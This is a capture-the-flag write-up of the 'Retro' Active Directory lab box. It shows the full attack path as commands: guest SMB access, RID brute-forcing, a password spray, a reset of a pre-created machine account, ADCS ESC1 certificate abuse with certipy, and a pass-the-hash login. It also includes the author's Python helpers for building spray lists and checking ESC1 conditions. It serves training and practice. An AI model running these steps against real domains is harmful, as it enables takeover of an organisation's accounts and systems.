Retro - Writeup (VulnLab & HackTheBox)


██████╗░███████╗████████╗██████╗░░█████╗░
██╔══██╗██╔════╝╚══██╔══╝██╔══██╗██╔══██╗
██████╔╝█████╗░░░░░██║░░░██████╔╝██║░░██║
██╔══██╗██╔══╝░░░░░██║░░░██╔══██╗██║░░██║
██║░░██║███████╗░░░██║░░░██║░░██║╚█████╔╝
╚═╝░░╚═╝╚══════╝░░░╚═╝░░░╚═╝░░╚═╝░╚════╝░
-----------------------------------------
Easy box with SMB null session for initial foothold,
RID bruteforce to get hints of a machine account,
password reset, and ESC1 abuse through ADCS to escalate to Domain Admin.
❄️ NMAP & INFO
53 → domain (Simple DNS Plus)
88 → kerberos-sec (Microsoft Windows Kerberos)
135 → msrpc (Microsoft Windows RPC)
139 → netbios-ssn (Microsoft Windows netbios-ssn)
389 → ldap (Microsoft Windows Active Directory LDAP)
445 → microsoft-ds?
464 → kpasswd5?
593 → ncacn_http (Microsoft Windows RPC over HTTP 1.0)
636 → ssl/ldap (Microsoft Windows Active Directory LDAP)
3268 → ldap (Microsoft Windows Active Directory LDAP)
3269 → ssl/ldap (Microsoft Windows Active Directory LDAP)
3389 → ms-wbt-server (Microsoft Terminal Services)
❄️ FOOTHOLD
Since we don’t have any credentials yet, I started by enumerating valid usernames through Kerberos (pre-authentication responses) with kerbrute, which revealed two valid accounts:
guest@retro.vl
administrator@retro.vl
An attempt at an RPC null session didn’t give me anything useful. So instead I tried SMB, this time logging in as the guest account with an empty password. Strictly speaking this is a guest logon rather than an anonymous null session, which is why the kerbrute hit on guest matters: the DC refuses anonymous share listing but still accepts guest.
Share enumeration worked, and the Trainees share looks interesting: we have Read permissions on it:
SMB | Null Session
Using smbclient.py:
smbclient.py DC.retro.vl/guest:''@10.129.172.145
After reading the note in the Trainees share, I enumerated domain accounts by RID brute-forcing with netexec, which also works over the guest logon:
nxc smb 10.129.172.145 -u guest -p '' --rid-brute
From the SidTypeUser entries I built a list of possible usernames and ran a password brute-force against them, which gave me valid credentials for the trainee account.
SMB | Trainee | flag.txt
Enumerating shares again with the trainee credentials reveals a new share called Notes, on which we have Read permissions. Connecting to it over SMB, we find two files:
user.txt (our user flag)
ToDo.txt
Bloodhound Time
After reading the ToDo.txt file, I collect domain data with bloodhound-python to map the AD objects and the relationships between them:
bloodhound-python -u 'trainee' -p '<REDACTED>' -ns 10.129.172.145 -d 'retro.vl' -c all --dns-tcp --zip
Based on the ToDo.txt hint about an old pre-created machine account, I found a computer object named BANKING.RETRO.VL.
Computer accounts created with the "pre-Windows 2000" option get a predictable initial password: the lowercase computer name without the trailing $. So the account name is BANKING$ and the candidate password is banking. I tested that and a few other common passwords:
The STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT error is the important signal here, and it is easy to misread as a failure. It does not mean the password is wrong: the password was accepted, but the account is a pre-created workstation trust account that the domain will not let log on until its password has been changed. The credential is valid; the account is simply unusable in its current state.
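To tie the RID brute-force step and the machine-account check together, here is an added Python example (my own code, not from the original writeup or from netexec) that parses constructed nxc --rid-brute output, builds the username list to spray, derives the pre-Windows 2000 default password for each machine account, and explains the NT status codes a spray against such an account returns. The sample output lines, the RIDs and the Principal/triage helper names are my own constructions; only the netexec line format and the status-code meanings are taken from real behaviour.

```python
import re
from dataclasses import dataclass

# Constructed sample of `nxc smb <dc> -u guest -p '' --rid-brute` output.
# RIDs and the set of accounts are illustrative, not the box's real values.
RID_BRUTE_OUTPUT = r"""
SMB         10.129.172.145  445    DC               500: RETRO\Administrator (SidTypeUser)
SMB         10.129.172.145  445    DC               501: RETRO\Guest (SidTypeUser)
SMB         10.129.172.145  445    DC               512: RETRO\Domain Admins (SidTypeGroup)
SMB         10.129.172.145  445    DC               513: RETRO\Domain Users (SidTypeGroup)
SMB         10.129.172.145  445    DC               1000: RETRO\DC$ (SidTypeUser)
SMB         10.129.172.145  445    DC               1104: RETRO\trainee (SidTypeUser)
SMB         10.129.172.145  445    DC               1106: RETRO\BANKING$ (SidTypeUser)
"""

# "<rid>: <DOMAIN>\<name> (<SidType>)" -- the name may contain spaces.
RID_LINE = re.compile(r"(\d+):\s+([^\\]+)\\(.+?)\s+\((SidType\w+)\)")


@dataclass(frozen=True)
class Principal:
    rid: int
    domain: str
    name: str
    sid_type: str

    @property
    def is_computer(self) -> bool:
        # Machine accounts are ordinary SidTypeUser objects in SAM;
        # the trailing '$' is what distinguishes them from people.
        return self.sid_type == "SidTypeUser" and self.name.endswith("$")


def parse_rid_brute(output: str) -> list:
    """Turn raw nxc --rid-brute lines into Principal records, skipping noise."""
    found = []
    for line in output.splitlines():
        m = RID_LINE.search(line)
        if m:
            rid, domain, name, sid_type = m.groups()
            found.append(Principal(int(rid), domain, name, sid_type))
    return found


def user_wordlist(principals) -> list:
    """Lowercased, deduplicated human accounts to feed a password spray."""
    names = {p.name.lower() for p in principals
             if p.sid_type == "SidTypeUser" and not p.is_computer}
    return sorted(names)


def precreated_password_candidates(principals) -> dict:
    """Computer accounts created as 'pre-Windows 2000' get the lowercase
    hostname (without the '$') as their initial password."""
    return {p.name: p.name[:-1].lower() for p in principals if p.is_computer}


# How to read the NT status a spray against a machine account comes back with.
NT_STATUS_TRIAGE = {
    "STATUS_LOGON_FAILURE": "wrong password",
    "STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT":
        "password is correct; pre-created computer account must change its "
        "password before the domain will let it log on",
    "STATUS_PASSWORD_MUST_CHANGE": "password is correct; it must be changed first",
}


def triage_auth_status(status: str) -> str:
    """Map an NT status string to what it tells the attacker about the password."""
    return NT_STATUS_TRIAGE.get(status.strip().upper(), "unknown status; inspect manually")


if __name__ == "__main__":
    principals = parse_rid_brute(RID_BRUTE_OUTPUT)
    print("users to spray:", user_wordlist(principals))
    print("machine-account defaults:", precreated_password_candidates(principals))
    print(triage_auth_status("STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT"))
```

The point of the triage table is the one that trips people up on this box: STATUS_LOGON_FAILURE is the only result that rules a password out; the workstation-trust-account status is a hit that just needs a password change before the account becomes usable.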
By running:
changepasswd.py retro.vl/'BANKING$':banking@10.129.172.145 -newpass '<REDACTED>' -dc-ip 10.129.172.145 -p rpc-samr
I was able to change the machine account password successfully. Impacket’s changepasswd.py script lets you change a user’s password over LDAP, kpasswd, SMB, or RPC. Both the SMB and RPC methods speak SAMR, but the SMB variant goes through the \pipe\samr named pipe and therefore needs a working SMB session on IPC$, which we cannot get with the default password (as already seen). rpc-samr talks SAMR over TCP via the endpoint mapper instead, and the SAMR change-password call proves knowledge of the old password itself, so no prior logon is required.
ADCS | PrivEsc
After reviewing BloodHound again and changing the password for BANKING$, I enumerate with netexec to check for ADCS and see if we can abuse any templates.
The result confirms there’s a PKI Enrollment Server at DC.retro.vl, and the Certificate Authority is retro-DC-CA.
ADCS | Finding Vulnerable Certificates
By running:
certipy find -vulnerable -u BANKING$@DC.retro.vl -p "<REDACTED>" -target 10.129.172.145 -dc-ip 10.129.172.145 -stdout
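To make concrete what certipy find -vulnerable is checking for when it flags ESC1, here is an added Python example (my own code, not certipy’s and not part of the original writeup) that evaluates a constructed template inventory against the ESC1 conditions for the groups BANKING$ belongs to. The Template fields, the template list, the group memberships and the helper names are assumptions for illustration; only the conditions themselves are the standard ESC1 definition, and the certipy req flags it emits are the ones used in this writeup.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Template:
    """The subset of template attributes that decide ESC1 (field names are my own)."""
    name: str
    enabled: bool                    # published on the CA
    client_auth_eku: bool            # Client Authentication, Smart Card Logon, PKINIT, Any Purpose, or no EKU
    enrollee_supplies_subject: bool  # CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT in msPKI-Certificate-Name-Flag
    manager_approval: bool           # CT_FLAG_PEND_ALL_REQUESTS in msPKI-Enrollment-Flag
    authorized_signatures: int       # msPKI-RA-Signature
    enrollment_rights: frozenset     # principals holding Enroll on the template
    min_key_size: int = 2048         # msPKI-Minimal-Key-Size


# Constructed template inventory: only RetroClients is meant to be ESC1-vulnerable.
TEMPLATES = [
    Template("RetroClients", True, True, True, False, 0,
             frozenset({"RETRO\\Domain Computers", "RETRO\\Domain Admins"}), min_key_size=4096),
    Template("User", True, True, False, False, 0,
             frozenset({"RETRO\\Domain Users"})),
    Template("WebServer", True, False, True, False, 0,
             frozenset({"RETRO\\Domain Admins"})),
]

# Groups a freshly reset BANKING$ holds tokens for (constructed for the example).
BANKING_GROUPS = frozenset({"RETRO\\Domain Computers", "RETRO\\Authenticated Users"})


def esc1_conditions(t: Template, principal_groups: frozenset) -> list:
    """Return the ESC1 preconditions this principal does NOT meet; empty list means abusable."""
    missing = []
    if not t.enabled:
        missing.append("template not enabled")
    if not t.client_auth_eku:
        missing.append("no client-authentication EKU")
    if not t.enrollee_supplies_subject:
        missing.append("enrollee does not supply subject")
    if t.manager_approval:
        missing.append("manager approval required")
    if t.authorized_signatures > 0:
        missing.append("authorized signature required")
    if not (t.enrollment_rights & principal_groups):
        missing.append("principal lacks enrollment rights")
    return missing


def find_esc1(templates, principal_groups) -> list:
    """Names of templates the given principal can abuse for ESC1."""
    return [t.name for t in templates if not esc1_conditions(t, principal_groups)]


def certipy_req_command(t: Template, ca: str, upn: str, user: str, dc_ip: str) -> str:
    """Build the certipy req line; -key-size is added only when the template's
    minimum exceeds certipy's default of 2048 bits, otherwise the CA rejects the CSR."""
    cmd = (f"certipy req -u '{user}' -p '<REDACTED>' -ca {ca} -template {t.name} "
           f"-upn {upn} -dc-ip {dc_ip} -target-ip {dc_ip}")
    if t.min_key_size > 2048:
        cmd += f" -key-size {t.min_key_size}"
    return cmd


if __name__ == "__main__":
    for t in TEMPLATES:
        print(t.name, "->", esc1_conditions(t, BANKING_GROUPS) or "ESC1")
    for name in find_esc1(TEMPLATES, BANKING_GROUPS):
        t = next(x for x in TEMPLATES if x.name == name)
        print(certipy_req_command(t, "retro-DC-CA", "administrator@retro.vl",
                                  "BANKING$@retro.vl", "10.129.172.145"))
```

The check that matters most for this box is the last one: a template can be wide open on paper, but it is only ESC1 for us if one of BANKING$’s groups (Domain Computers here) actually holds Enroll on it. That is why a controllable machine account, not just any low-privilege user, is the pivot.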
ESC1 Abuse
Now we can abuse ESC1 with certipy, requesting a certificate from the RetroClients template with the administrator UPN placed in the subject alternative name. The -key-size 4096 flag is not cosmetic: certipy defaults to 2048-bit keys, and the CA rejects the request when the template enforces a larger minimum key length:
certipy req -u 'BANKING$'@retro.vl -p '<REDACTED>' -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl -dc-ip 10.129.172.145 -target-ip 10.129.172.145 -key-size 4096
With the certificate issued, I authenticate with it through PKINIT to retrieve the administrator NT hash, then log in as administrator via evil-winrm:
evil-winrm -i 10.129.172.145 -u Administrator -H '<HASH>'
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
Pwned!
Written by shkz
I am shkz, a Security Researcher, Red Teamer and CTF Player.